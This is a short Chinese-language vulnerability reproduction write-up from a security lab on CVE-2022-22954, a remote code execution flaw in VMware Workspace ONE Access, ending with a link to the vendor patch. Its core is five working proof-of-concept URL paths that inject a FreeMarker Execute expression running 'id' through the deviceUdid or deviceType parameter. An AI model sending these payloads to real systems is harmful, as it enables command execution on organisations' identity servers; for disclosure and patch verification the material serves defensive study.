VMware Workspace ONE Access RCE 远程代码执行漏洞CVE-2022-22954
漏洞信息
VMware Workspace ONE Access(以前称为VMware Identity Manager)旨在通过多因素身份验证、条件访问和单点登录,让您的员工更快地访问SaaS、Web和本机移动应用程序。
近日VMware官网发布了VMware Workspace ONE Access存在多个漏洞:
漏洞复现
武汉明嘉信安全实验室本地搭建漏洞利用环境
搭建环境进行虚拟机导入,下载存在漏洞的VMware Workspace ONE Access OVA文件,主机名需要设置为域名
漏洞验证POC如下:
/catalog-portal/ui?code=&deviceUdid=&deviceType=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/hub-ui?deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
burp发送验证代码执行成功
漏洞修复
参考漏洞影响范围进行排查。目前官方已发布修复补丁,请查看官方消息进行修复:https://kb.vmware.com/s/article/88099